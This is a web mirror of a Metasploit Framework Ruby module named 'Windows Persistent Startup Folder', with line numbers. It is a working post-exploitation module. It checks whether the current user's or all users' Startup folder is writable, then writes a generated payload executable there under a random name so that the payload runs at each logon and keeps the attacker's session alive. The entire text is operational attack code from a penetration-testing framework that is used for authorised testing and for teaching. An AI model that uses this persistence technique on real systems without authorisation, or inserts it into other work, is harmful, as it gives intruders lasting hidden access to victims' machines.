Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/persistence/startup_folder.rb
25357 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Local

7
  Rank = ExcellentRanking

8


9
  include Msf::Post::File

10
  include Msf::Exploit::EXE

11
  include Msf::Exploit::Local::Persistence

12
  prepend Msf::Exploit::Remote::AutoCheck

13


14
  def initialize(info = {})

15
    super(

16
      update_info(

17
        info,

18
        'Name' => 'Windows Persistent Startup Folder',

19
        'Description' => %q{

20
          This module establishes persistence by creating a payload in the user or system startup folder.

21
          Works on Vista and newer systems.

22
        },

23
        'License' => MSF_LICENSE,

24
        'Author' => [ 'h00die' ],

25
        'Platform' => [ 'win' ],

26
        'SessionTypes' => [ 'meterpreter', 'shell' ],

27
        'Targets' => [

28
          [ 'Automatic', {} ]

29
        ],

30
        'DefaultTarget' => 0,

31
        'References' => [

32
          ['ATT&CK', Mitre::Attack::Technique::T1547_001_REGISTRY_RUN_KEYS_STARTUP_FOLDER],

33
          ['URL', 'https://support.microsoft.com/en-us/windows/configure-startup-applications-in-windows-115a420a-0bff-4a6f-90e0-1934c844e473']

34
        ],

35
        'DisclosureDate' => '1995-01-01', # windows 95

36
        'Notes' => {

37
          'Stability' => [CRASH_SAFE],

38
          'Reliability' => [REPEATABLE_SESSION, EVENT_DEPENDENT],

39
          'SideEffects' => [ARTIFACTS_ON_DISK]

40
        }

41
      )

42
    )

43


44
    register_options(

45
      [

46
        OptString.new('PAYLOAD_NAME', [false, 'Name of payload file to write. Random string as default.']),

47
        OptEnum.new('CONTEXT', [false, 'Target current User or All Users (system)', 'USER', ['USER', 'SYSTEM'] ])

48
      ]

49
    )

50
  end

51


52
  def folder

53
    if datastore['CONTEXT'] == 'USER'

54
      f = session.sys.config.getenv('%userprofile%')

55
      f = "#{f}\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup"

56
      return f

57
    end

58
    f = session.sys.config.getenv('%ProgramData%')

59
    "#{f}\\Microsoft\\Windows\\Start Menu\\Programs\\Startup"

60
  end

61


62
  def check

63
    f = folder

64
    begin

65
      # windows only ps payloads have writable? so try that first

66
      return CheckCode::Safe("Unable to write to #{f}") unless writable?(f)

67
    rescue RuntimeError

68
      filename = f + '\\' + Rex::Text.rand_text_alpha((rand(6..13)))

69
      write_file(filename, '')

70
      if exists? filename

71
        rm_f(filename)

72
        return CheckCode::Appears("Likely exploitable, able to write test file to #{f}")

73
      else

74
        return CheckCode::Safe("Unable to write to #{f}")

75
      end

76
    end

77


78
    CheckCode::Appears('Likely exploitable')

79
  end

80


81
  def install_persistence

82
    payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(6..13)))

83
    payload_exe = generate_payload_exe

84
    payload_pathname = folder + '\\' + payload_name + '.exe'

85
    vprint_good("Writing payload to #{payload_pathname}")

86
    fail_with(Failure::UnexpectedReply, "Error writing payload to: #{payload_pathname}") unless write_file(payload_pathname, payload_exe)

87
    vprint_status("Payload (#{payload_exe.length} bytes) uploaded on #{sysinfo['Computer']} to #{payload_pathname}")

88
    @clean_up_rc << "rm \"#{payload_pathname.gsub('\\', '/')}\"\n"

89
  end

90
end

91


92